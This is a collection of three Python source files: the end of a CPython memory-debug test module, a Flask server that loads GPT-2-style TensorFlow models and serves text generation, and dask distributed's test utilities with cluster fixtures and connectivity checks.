def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
server.py
|
#!/usr/bin/env python3
import os
import sys
sys.path += [os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'src')]
sys.path += [os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))]
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import fire
import json
import os
import numpy as np
import tensorflow as tf
import tflex
import re
import time
import requests
import model, sample, encoder
import subprocess
from sanitizers.chatbot import sanitize as chat_sanitize
from flask import Flask, request, jsonify
from flask_apscheduler import APScheduler
from multiprocessing import Process
app = Flask(__name__)
class ModelController(object):
def __init__(self, models):
self.models = models
self.active_model_key = None
def acquire(self, key):
self.active_model_key = key
for k in self.models.keys():
if k != key:
self.models[k].close()
self.models[key].start_session()
return self.models[key]
class Model(object):
def __init__(self, model_name, restore_from, sanitize):
self.N_SAMPLES = 1
self.BATCH_SIZE = 1
self.model_name = model_name
self.restore_from = restore_from
self.do_sanitize = sanitize is not None
self.sanitize = sanitize
self.seed = None
self.no_cuda = False # just hard code this for now
self.inferences = []
self.enc = encoder.get_encoder(self.model_name)
self.hparams = model.default_hparams()
with open(os.path.join('models', self.model_name, 'hparams.json')) as f:
self.hparams.override_from_dict(json.load(f))
self.sess = None
self.sess_closed = False
self.pattern = re.compile('[^\w]')
self.last_used = time.time()
self.model_expiration = 30 # seconds
def has_session(self):
return self.sess is not None and self.sess_closed is False
def start_session(self):
if self.has_session():
return
self.graph = tf.Graph()
config = tf.ConfigProto(device_count = {'GPU':0})
self.sess = tflex.Session(graph=tf.Graph(), config=config if self.no_cuda else None)
self.sess.__enter__()
self.context = tf.placeholder(tf.int32, [self.BATCH_SIZE, None])
np.random.seed(self.seed)
tf.set_random_seed(self.seed)
self.output = sample.sample_sequence(
hparams=self.hparams,
length=120,#self.hparams.n_ctx // 2,
context=self.context,
batch_size=1,
temperature=0.3, top_k=40, top_p=0.9, penalize=0.85
)
saver = tflex.Saver()
ckpt = tflex.latest_checkpoint(self.restore_from)
saver.restore(self.sess, ckpt)
def close(self):
if self.sess is not None:
print("CLEANING MODEL")
self.sess.close()
self.sess_closed = True
# del self.sess
# self.sess = None
else:
print("...not cleaning")
#self.inferences.clear()
def clean(self):
return
now = time.time()
print(f"self.sess exists {self.sess is not None}")
if self.last_used > 0 and self.last_used + self.model_expiration < now:
print(f"Cleaning up model {self.last_used} + {self.model_expiration} < {now}")
self.close()
else:
print(f"Not cleaning up model {self.last_used} + {self.model_expiration} < {now}")
def predict(self, raw_text):
print(f"-------INPUT------\n{raw_text}\n--------------\n")
self.start_session()
self.last_used = time.time()
print(f"last_used == {self.last_used}")
print(f"GPU_available: {tf.test.is_gpu_available()}")
if len(raw_text) > 1 and raw_text.endswith('\n'):
raw_text = raw_text[:-1]
context_tokens = self.enc.encode(raw_text)
self.inferences.append(raw_text)
generated = 0
print(f">>>> Getting {self.N_SAMPLES // self.BATCH_SIZE} samples")
for _ in range(self.N_SAMPLES // self.BATCH_SIZE):
out = self.sess.run(self.output, feed_dict={
self.context: [context_tokens for _ in range(self.BATCH_SIZE)]
})[:, len(context_tokens):]
print(f">>>> Returning {self.BATCH_SIZE}")
for i in range(self.BATCH_SIZE):
generated += 1
text = self.enc.decode(out[i])
return self.sanitize(text) if self.do_sanitize else text
def initializer(config_path="server_config.json"):
print(f"Initializing with {config_path}")
with open(config_path, 'r') as cfile:
data=cfile.read()
obj = json.loads(data)
obj['JOBS'] = [
{
'id': 'cleanup',
'func': 'server:_call_clean',
'trigger': 'interval',
'seconds': 10,
}
]
obj['SCHEDULER_API_ENABLED'] = True
print(f"Loaded obj {obj.keys()}")
models = {}
for item in obj['models']:
print(f"Loading {item}")
model = Model(item['model_name'],
item['restore_from'],
chat_sanitize if 'sanitizer' in item else None)
models[item['key']] = model
return (models, obj)
MODELS, CONFIG = fire.Fire(initializer)
CONTROLLER = ModelController(MODELS)
BASE_URL = f'http://{CONFIG["host"]}:{CONFIG["port"]}/'
def _infer(robj):
global MODELS
if robj is None:
return "UNKNOWN"
model_key = 'chatbot'
if 'model_key' in robj:
model_key = robj['model_key']
if model_key not in MODELS:
print(f"Could not find {model_key} in MODELS ({MODELS.keys()})")
return "UNKNOWN"
raw_text = robj['raw_text']
result = CONTROLLER.acquire(model_key).predict(raw_text)
return result
def _call_remote(url, robj):
r = requests.post(url, json=robj)
print(f'_call_remote: status_code == {r.status_code}')
print(r.status_code)
print(r.raw)
def _call_infer(robj):
return _call_remote(f'{BASE_URL}/invocations', robj)
@app.route('/invocations', methods=['POST'])
def infer():
return _infer(request.json)
@app.route('/ping')
def pong():
return "Pong!"
@app.route('/prime', methods=['POST'])
def prime():
robj = request.json
if "raw_text" not in robj:
robj["raw_text"] = "prime this bitch"
p = Process(target=_call_infer, args=(robj,))
p.start()
return f"primed {robj['model_key']}"
@app.route('/models/list')
def list_models():
robj = dict()
robj['models'] = list()
for k in MODELS.keys():
robj['models'].append({ 'model_key': k, 'num_inferences' : len(MODELS[k].inferences) })
robj['active_model'] = { 'key': CONTROLLER.active_model_key }
return jsonify(robj)
@app.route('/gputemp')
def gputemp():
result = subprocess.run(['nvidia-smi'], capture_output=True)
temps = []
output = str(result.stdout).split('\\n')
print(f'There are {len(output)} lines')
for line in output:
if "%" in line:
tmps = line.split(' ')
temps.append(tmps[4])
return jsonify(temps)
@app.route('/')
def hello():
return "<html><body><h1 style='color:#AAAA00;font-family:consolas'>hello friend</style></body></html>"
if __name__ == '__main__':
app.run(host=CONFIG['host'], port=CONFIG['port'], debug=CONFIG['debug'])
|
utils_test.py
|
import asyncio
import collections
import copy
import functools
import gc
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import uuid
import warnings
import weakref
from contextlib import contextmanager, nullcontext, suppress
from glob import glob
from time import sleep
try:
import ssl
except ImportError:
ssl = None
import pytest
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from . import system
from .client import Client, _global_clients, default_client
from .comm import Comm
from .compatibility import WINDOWS
from .config import initialize_logging
from .core import CommClosedError, Status, connect, rpc
from .deploy import SpecCluster
from .diagnostics.plugin import WorkerPlugin
from .metrics import time
from .nanny import Nanny
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
DequeHandler,
TimeoutError,
_offload_executor,
get_ip,
get_ipv6,
iscoroutinefunction,
log_errors,
mp_context,
reset_logger_locks,
sync,
thread_state,
)
from .worker import Worker
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_TEST_TIMEOUT = 30
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, config, port=0, **kwargs):
with dask.config.set(config):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=10,
disconnect_timeout=20,
scheduler_kwargs={},
config={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1, config),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q, config),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers],
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=30)
with suppress(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with suppress(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with rpc(addr, **rpc_kwargs) as w:
# If the worker was killed hard (e.g. sigterm) during test runtime,
# we do not know at this point and may not be able to connect
with suppress(EnvironmentError, CommClosedError):
# Do not request a reply since comms will be closed by the
# worker before a reply can be made and we will always trigger
# the timeout
await w.terminate(reply=False)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*[disconnect(addr, timeout, rpc_kwargs) for addr in addresses])
def gen_test(timeout=_TEST_TIMEOUT):
"""Coroutine test
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
async def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs),
)
for i, ncore in enumerate(nthreads)
]
# for w in workers:
# w.rpc = workers[0].rpc
await asyncio.gather(*workers)
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
await asyncio.sleep(0.01)
if time() - start > 5:
await asyncio.gather(*[w.close(timeout=1) for w in workers])
await s.close(fast=True)
raise Exception("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*[end_worker(w) for w in workers])
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=_TEST_TIMEOUT,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
clean_kwargs={},
allow_unclosed=False,
):
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
See also:
start
end
"""
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=", stacklevel=2)
nthreads = ncores
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 10}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
def test_func():
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for _ in range(60):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster: "
f"{e.__class__.__name__}: {e}; retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
future = func(*args)
if timeout:
future = asyncio.wait_for(future, timeout)
result = await future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == Status.closed)
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 60:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except EnvironmentError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
return test_func
return _
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(10)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError("Failed to connect to %s" % (address,))
try:
sock = socket.create_connection(address, timeout=timeout)
except EnvironmentError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
if os.getenv("DISABLE_IPV6") == "1":
return False
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
except EnvironmentError:
return False
else:
return True
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger."""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler."""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
